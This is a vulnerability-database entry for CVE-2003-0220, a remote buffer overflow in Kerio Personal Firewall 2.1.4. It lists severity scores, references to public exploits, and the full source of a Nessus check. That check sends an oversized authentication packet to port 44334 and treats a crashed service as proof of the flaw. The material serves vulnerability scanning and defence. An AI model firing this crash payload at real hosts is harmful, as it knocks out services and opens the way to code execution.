Vulnerabilities > CVE-2003-0220 - Remote Authentication Packet Buffer Overflow vulnerability in Kerio Personal Firewall 2

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
kerio
nessus
exploit available
metasploit

Summary

Buffer overflow in the administrator authentication process for Kerio Personal Firewall (KPF) 2.1.4 and earlier allows remote attackers to execute arbitrary code via a handshake packet.

Exploit-Db

  • descriptionKerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (2). CVE-2003-0220. Remote exploit for windows platform
    idEDB-ID:22418
    last seen2016-02-02
    modified2003-04-30
    published2003-04-30
    reporterThreaT
    sourcehttps://www.exploit-db.com/download/22418/
    titleKerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow Vulnerability 2
  • descriptionKerio Firewall 2.1.4 Authentication Packet Overflow. CVE-2003-0220. Remote exploit for windows platform
    idEDB-ID:16465
    last seen2016-02-01
    modified2010-06-15
    published2010-06-15
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/16465/
    titleKerio Firewall 2.1.4 - Authentication Packet Overflow
  • descriptionKerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (1). CVE-2003-0220. Dos exploit for windows platform
    idEDB-ID:22417
    last seen2016-02-02
    modified2003-04-28
    published2003-04-28
    reporterCore Security
    sourcehttps://www.exploit-db.com/download/22417/
    titleKerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow Vulnerability 1
  • descriptionKerio Personal Firewall. CVE-2003-0220. Remote exploit for windows platform
    idEDB-ID:1537
    last seen2016-01-31
    modified2006-02-28
    published2006-02-28
    reportery0
    sourcehttps://www.exploit-db.com/download/1537/
    titleKerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow
  • descriptionKerio Personal Firewall 2.1.4 Remote Code Execution Exploit. CVE-2003-0220. Remote exploit for windows platform
    idEDB-ID:28
    last seen2016-01-31
    modified2003-05-08
    published2003-05-08
    reporterBurebista
    sourcehttps://www.exploit-db.com/download/28/
    titleKerio Personal Firewall 2.1.4 - Remote Code Execution Exploit

Metasploit

descriptionThis module exploits a stack buffer overflow in Kerio Personal Firewall administration authentication process. This module has only been tested against Kerio Personal Firewall 2 (2.1.4).
idMSF:EXPLOIT/WINDOWS/FIREWALL/KERIO_AUTH
last seen2020-04-11
modified2017-07-24
published2006-09-13
referenceshttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0220
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/firewall/kerio_auth.rb
titleKerio Firewall 2.1.4 Authentication Packet Overflow

Nessus

NASL familyFirewalls
NASL idKERIO_PF_BUFFER_OVERFLOW.NASL
descriptionKerio Personal Firewall is vulnerable to a buffer overflow attack involving the administrator authentication process. An attacker may use this to crash Kerio or to execute arbitrary code on the system.
last seen2020-06-01
modified2020-06-02
plugin id11575
published2003-05-06
reporterThis script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11575
titleKerio Personal Firewall Administrator Authentication Handshake Packet Remote Buffer Overflow
code
#
# (C) Tenable Network Security, Inc.
#

# Exploit string by Core Security Technologies
#
# References:
# Date: Mon, 28 Apr 2003 15:34:27 -0300
# From: "CORE Security Technologies Advisories" <[email protected]>
# To: "Bugtraq" <[email protected]>, "Vulnwatch" <[email protected]>
# Subject: CORE-2003-0305-02: Vulnerabilities in Kerio Personal Firewall
#
# From: SecuriTeam <[email protected]>
# Subject: [EXPL] Vulnerabilities in Kerio Personal Firewall (Exploit)
# To: [email protected]
# Date: 18 May 2003 21:03:11 +0200
#
# Changes by rd : uncommented the recv() calls and tested it.
#

include("compat.inc");

if (description)
{
  script_id(11575);
  script_version("1.20");
  script_cvs_date("Date: 2018/11/15 20:50:22");

  script_cve_id("CVE-2003-0220");
  script_bugtraq_id(7180);

  script_name(english:"Kerio Personal Firewall Administrator Authentication Handshake Packet Remote Buffer Overflow");
  script_summary(english:"Buffer overflow on KPF administration port");

  script_set_attribute(attribute:"synopsis", value:"The remote service is affected by a buffer overflow vulnerability.");
  script_set_attribute(attribute:"description", value:
"Kerio Personal Firewall is vulnerable to a buffer overflow attack
involving the administrator authentication process. An attacker may
use this to crash Kerio or to execute arbitrary code on the system.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2003/Apr/358");
  script_set_attribute(attribute:"solution", value:"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Kerio Firewall 2.1.4 Authentication Packet Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2003/04/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2003/05/06");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:kerio:personal_firewall");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
  script_family(english:"Firewalls");

  #script_dependencie("find_service1.nasl");
  script_require_keys("Settings/ParanoidReport");    
  script_require_ports("Services/kerio", 44334);

  exit(0);
}


include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = 44334;		# Default port
if (! get_port_state(port)) exit(0);

soc = open_sock_tcp(port);
if (! soc) exit(0);

b = recv(socket: soc, length: 10);
b = recv(socket: soc, length: 256);
expl = raw_string(0x00, 0x00, 0x14, 0x9C);
expl += crap(0x149c);
send(socket: soc, data: expl);
close(soc);

soc = open_sock_tcp(port);
if (! soc) security_hole(port);

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/82995/kerio_auth.rb.txt
idPACKETSTORM:82995
last seen2016-12-05
published2009-11-26
reporterMC
sourcehttps://packetstormsecurity.com/files/82995/Kerio-Firewall-2.1.4-Authentication-Packet-Overflow.html
titleKerio Firewall 2.1.4 Authentication Packet Overflow